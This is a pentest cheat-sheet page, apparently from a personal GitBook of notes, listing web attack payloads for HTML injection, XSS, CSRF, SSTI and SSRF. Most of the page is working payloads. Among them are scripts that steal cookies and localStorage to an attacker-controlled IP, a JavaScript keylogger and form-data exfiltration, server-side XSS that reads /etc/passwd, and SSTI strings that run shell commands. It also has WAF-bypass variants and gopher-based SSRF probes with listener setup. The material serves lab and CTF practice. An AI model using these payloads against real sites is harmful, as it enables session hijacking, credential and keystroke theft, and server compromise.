Pentest
TryhackmeHackthebox
  • 🐧Linux
    • Lateral Movement
    • PrivilageEsc Linux 👑
  • 🪟Windows
    • Lateral Movement
    • PrivilageEsc Windows 👑
    • Active Directory / SMB
  • ☁️Cloud
    • AWS
    • Docker
    • Azure AD
    • Kubernetes
  • 🛠️Tools
    • File Transfers
    • Shells / Payloads
    • Pivoting / Forwarding
    • Network Enumeration
    • Cracking / Fuzzing / Brute-force
  • 🚐TCP
    • 21 ) FTP
    • 22 ) SSH
    • 25 ) SMTP
    • 53 ) DNS
    • 79 ) Finger
    • 110 ) POP3
    • 143, 993 ) IMAP
    • 389 ) LDAP
    • 443 ) HTTPS
    • 2049 /111 ) NFS /RPC
    • 3128 ) Squid Proxy
    • 3690 ) Subversion
    • 6379 ) Redis
    • 9200 ) Elasticsearch
    • 11211 ) Memcached
    • 24007 & 49152) Gluster
  • 🚎UDP
    • 69 ) TFTP
    • 161 ) SNMP
    • 500, 4500 ) IPsec IKE
    • 623) IPMI
  • 🔟OWASP 10
    • SQLi
    • NoSQLi
    • LFI / XXE
    • Command Injection
    • XSS / HTMLi / (S/C)SRF / SSTI
  • 📚Database
    • Oracle SQL | 1521
    • MSSQL / MYSQL / PSQL
  • 🔗Binary Exploitation
    • Linux
    • Windows
  • 👨‍🚒Red team
    • Reconnaissance
    • Initial Access
    • Persistence Techniques
    • AV Evasion Techniques
  • 🐰Bug Bounty
    • Search Engine
    • Index.html
  • ⌚Links
    • Passwords 1
    • Default Passwords
    • Default passwords 2
  • 🔄Other
    • Git
    • HackerGPT
    • Curl
    • Hints!!
    • Log4j
    • Mobile Sec
    • BookMarks
    • Steganography
    • CMS / Servers / Others
    • Deserialization
    • Tryhackme
  • 🤖Mobile Android Pentest
    • Mobile Sec
    • Drozer
  • Group 1
    • 📦HackTheBox — Writeups
      • 🏴‍☠️HTB - Devvortex
Powered by GitBook
On this page
  • 01. HTML Injection
  • 02. Cross Site Scripting (XSS)
  • 03. Cross-Site Request Forgery (CSRF)
  • 04. Server-Side Template Injection (SSTI)
  • 05. Server-Side Request Forgery (SSRF)
  1. OWASP 10

XSS / HTMLi / (S/C)SRF / SSTI

01. HTML Injection

  • Basic Test Payloads

<h1>h4rithd was here</h1>
<b>h4rithd was here<b>
<img src="https://media.giphy.com/media/3XpvBjjMWtYYIOtOlp/giphy.gif"/>
<img src="https://media.tenor.com/He2W0AQvZfsAAAAC/hacked-hack.gif"/>

<marquee direction="up">h4rithd was here.</marquee>
<marquee direction="left" behavior="alternate">h4rithd was here</marquee>
<marquee behavior="scroll" direction="up"><img src="https://c.tenor.com/uXWSDlYIKl0AAAAM/danceroblox.gif"/></marquee>

02. Cross Site Scripting (XSS)

  • Steal Cookie

## ------------------| Setup on my machine
#### Basic [h4rithd.js
fetch("http://<IP>/favicon.ico?c="+document.cookie);
#### Encoded
fetch("http://<IP>/favicon.ico?c=" + btoa(document.cookie))
fetch("http://<IP>/favicon.ico?c=" + encodeURIComponent(document.cookie))

## ------------------| Payload 
<script src="http://<IP>/h4rithd.js"></script>
  • Payloads

nc -lvnp 80
<script>document.write('<img src="http://<MYIP>/logo.gif?cookie='+document.cookie+'"/>')</script>
<script>new Image().src="http://<MYIP>/logo.jpg?output="+document.cookie;</script>

## ------------------| Common paylods
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efim)``>
<script>alert(123)</script>
<script>location.replace("https://h4rithd.com")</script>
<script>alert(localStorage.authorizations)</script>
<script>alert(JSON.stringify(localStorage))</script>
<img src='https://127.0.0.1/fav.ico?j0k3n='+JSON.stringify(localStorage);'--!>
"/><script>alert(123)</script>
"/><IMG SRC=x onmouseover="alert('xss')">
<IMG SRC=x onmouseover="alert('xss')">
<img src=http://10.10.14.22/hit/>
<img src=x onerror=this.src='http://10.10.14.22/?cookies='+btoa(document.cookie)/>  
<xss id=x tabindex=1 onactivate=alert(1)></xss>
<script>location.replace("https://h4rithd.com")</script>

## ------------------| Other Paylods
<IMG onmouseover="alert('xss')">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC= onmouseover="alert('xss')">
<IMG SRC=# onmouseover="alert('xss')">
<IMG SRC=x onmouseover="alert('xss')">
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"\>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
\<a onmouseover="alert(document.cookie)"\>xss link\</a\>
\<a onmouseover=alert(document.cookie)\>xss link\</a\>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

## ------------------| WAF Bypass
<svg on onload=(alert)(123)>
<svg onx=() onload=(confirm)(1)>
<x"/onclick=(confirm)()>h4rithd!
<svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23x000000028;document.domain)>
javascript:{ alert`0` }
1'"><img/src/onerror=.1|alert``>
<img ignored=() src=x onerror=prompt(1)>
## ------------------| Host this from your end
var xhr = new XMLHttpRequest();
var url = "http://localhost/admin/backdoorchecker.php";
var params = "cmd=dir | ping -n 2 10.10.14.22";
xhr.open("POST", url);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.withCredentials = true;
xhr.send(params);

# catch this via payload
<script src=http://10.10.14.22/script.js></script>
  • Server Side XSS (Dynamic PDF)

## ------------------| Read local file
<script>
x=new XMLHttpRequest;
x.onload=function(){document.write(this.responseText)};
x.open("GET","file:///etc/passwd");x.send();
</script>

## If you need base64 encoded text, then use thisone.
x.onload=function(){document.write(btoa(this.responseText))};
  • Other APIs

## ------------------| Start the sever for fetch the data
sudo python3 -m http.server 80

## ------------------| Extract stored passwords
<script>
for(let values of document.getElementsByTagName("input")){fetch("http://IP/favicon.ico?data=" + values.value);}
</script>

## ------------------| Keylogers
<script>
function klog(event){fetch("http://IP/favicon.ico?data=" + event.key);}
document.addEventListener('keydown',klog);
</script>

03. Cross-Site Request Forgery (CSRF)

  • Create Payload

<html>
   <iframe src="http://MyIP/IFrameIsWorkingFine"></iframe>
   <iframe src="http://10.10.10.97/ChangePass?password=Welcome123"></iframe>
</html>

04. Server-Side Template Injection (SSTI)

{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
*{7*7}
#{1+3+3+7}
${{<%[%'"}}%\.
{{.}}
{{user}}
{{config}}
{{password}}

{%include user%}
{%include config%}
{% include config %}
{%include password%}

{{ get_flashed_messages.globals.builtins.open("/etc/passwd").read() }}
{{ namespace.__init__.__globals__.os.popen('id').read() }}
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}

## ------------------| SpringFramework’s 
{"harithd".replace("a","4")}
{"".getClass().forName("java.lang.Runtime").getRuntime().exec("ping -c 2 <IP>")}

05. Server-Side Request Forgery (SSRF)

### Setup local web server 
sudo python3 -m http.server 80

### Browse URL

### scan localports
/url.php?path=http://localhost:80
wfuzz -u 'http://10.10.10.55:60000/url.php?path=localhost:FUZZ' -z range,1-65535 --hl 2    
## ------------------| Test Vuln
### Setup Listener
sudo nc -lvnp 80
### Check if if vuln 
### [\n ==> %0a, %25%30%61 (dubbel Encoded) , space ==> %20, %25%32%30 (dubbel Encoded)]
/url.php?path=gopher://<IP>:80/_GET / HTTP/1.0
/url.php?path=gopher://<IP>:80/_GET%%32%30%2fh4rithd.com%25%32%30HTTP/1.1
### Try to send internal requests
PreviousCommand InjectionNextDatabase

Last updated 2 years ago

source:PayloadsAllTheThings

Click for list of payloads.

Gopher []

🔟
XMLHttpRequest
here
Link